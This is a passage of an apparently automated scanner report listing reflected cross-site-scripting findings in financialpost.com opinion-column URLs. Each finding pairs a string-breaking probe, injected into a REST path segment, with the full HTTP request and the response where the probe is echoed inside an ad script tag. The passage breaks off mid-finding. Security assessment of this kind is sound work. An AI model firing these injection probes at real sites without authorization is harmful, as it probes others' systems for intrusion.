<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists10172';e803ff19434/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists10172';e803ff19434;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99836883?">
...[SNIP]...

1.206. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf31'%3b503052c6ac3 was submitted in the REST URL parameter 4. This input was echoed as ebf31';503052c6ac3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Diabetes+RDSP+confusion/3996673ebf31'%3b503052c6ac3/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64067
Expires: Sun, 19 Dec 2010 03:13:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/diabetes-rdsp-confusion/3996673ebf31';503052c6ac3/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=diabetes-rdsp-confusion;kw=3996673ebf31';503052c6ac3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...

1.207. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6915'%3bc70b98c8ed7 was submitted in the REST URL parameter 5. This input was echoed as e6915';c70b98c8ed7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Diabetes+RDSP+confusion/3996673/e6915'%3bc70b98c8ed7 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44167


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/diabetes%20rdsp%20confusion/3996673/e6915';c70b98c8ed7/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=diabetes%20rdsp%20confusion;kw=3996673;kw=e6915';c70b98c8ed7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+sur
...[SNIP]...

1.208. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6aacf'%3b2dcc50d2bea was submitted in the REST URL parameter 1. This input was echoed as 6aacf';2dcc50d2bea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion6aacf'%3b2dcc50d2bea/columnists/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81434
Expires: Sun, 19 Dec 2010 03:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion6aacf';2dcc50d2bea/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion6aacf';2dcc50d2bea;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=35050549?">
...[SNIP]...

1.209. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ee06'%3bd1610b97601 was submitted in the REST URL parameter 2. This input was echoed as 6ee06';d1610b97601 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists6ee06'%3bd1610b97601/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76267
Expires: Sun, 19 Dec 2010 03:13:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists6ee06';d1610b97601/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists6ee06';d1610b97601;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=74713967?">
...[SNIP]...

1.210. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d84'%3b589204317ff was submitted in the REST URL parameter 4. This input was echoed as b5d84';589204317ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686b5d84'%3b589204317ff/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70018
Expires: Sun, 19 Dec 2010 03:13:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/gordon-brown-fairy-tale/3996686b5d84';589204317ff/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=gordon-brown-fairy-tale;kw=3996686b5d84';589204317ff;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...

1.211. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8d99'%3b477af5f2dc was submitted in the REST URL parameter 5. This input was echoed as b8d99';477af5f2dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686/b8d99'%3b477af5f2dc HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44189


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/gordon%20brown%20fairy%20tale/3996686/b8d99';477af5f2dc/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=gordon%20brown%20fairy%20tale;kw=3996686;kw=b8d99';477af5f2dc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+su
...[SNIP]...

1.212. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caad9'%3bfe560cef6f1 was submitted in the REST URL parameter 1. This input was echoed as caad9';fe560cef6f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinioncaad9'%3bfe560cef6f1/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81153
Expires: Sun, 19 Dec 2010 03:13:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinioncaad9';fe560cef6f1/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinioncaad9';fe560cef6f1;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94873299?">
...[SNIP]...

1.213. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fea'%3bac5e157b03 was submitted in the REST URL parameter 2. This input was echoed as a4fea';ac5e157b03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistsa4fea'%3bac5e157b03/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75080
Expires: Sun, 19 Dec 2010 03:13:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsa4fea';ac5e157b03/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsa4fea';ac5e157b03;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13084670?">
...[SNIP]...

1.214. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a83e8'%3b1465d38c955 was submitted in the REST URL parameter 4. This input was echoed as a83e8';1465d38c955 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670a83e8'%3b1465d38c955/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71352
Expires: Sun, 19 Dec 2010 03:13:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/hoping-santa-puts-inflation-stocking/3996670a83e8';1465d38c955/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=hoping-santa-puts-inflation-stocking;kw=3996670a83e8';1465d38c955;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa
...[SNIP]...

1.215. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faabd'%3b92cf6eecfea was submitted in the REST URL parameter 5. This input was echoed as faabd';92cf6eecfea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/faabd'%3b92cf6eecfea HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44507


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/hoping%20santa%20puts%20inflation%20stocking/3996670/faabd';92cf6eecfea/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=hoping%20santa%20puts%20inflation%20stocking;kw=3996670;kw=faabd';92cf6eecfea;kw=npo;kw=fpo;tile='+dartad_tile+';
...[SNIP]...

1.216. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Retired+forgotten/3996666/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ad4f'%3be55a38084cf was submitted in the REST URL parameter 1. This input was echoed as 8ad4f';e55a38084cf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion8ad4f'%3be55a38084cf/columnists/Retired+forgotten/3996666/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82077
Expires: Sun, 19 Dec 2010 03:14:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion8ad4f';e55a38084cf/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion8ad4f';e55a38084cf;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24013518?">
...[SNIP]...

1.217. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Retired+forgotten/3996666/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a104'%3b5a547f5c299 was submitted in the REST URL parameter 2. This input was echoed as 3a104';5a547f5c299 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists3a104'%3b5a547f5c299/Retired+forgotten/3996666/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83730
Expires: Sun, 19 Dec 2010 03:14:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists3a104';5a547f5c299/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists3a104';5a547f5c299;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14547920?">
...[SNIP]...

1.218. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Retired+forgotten/3996666/story.html

Issue detail

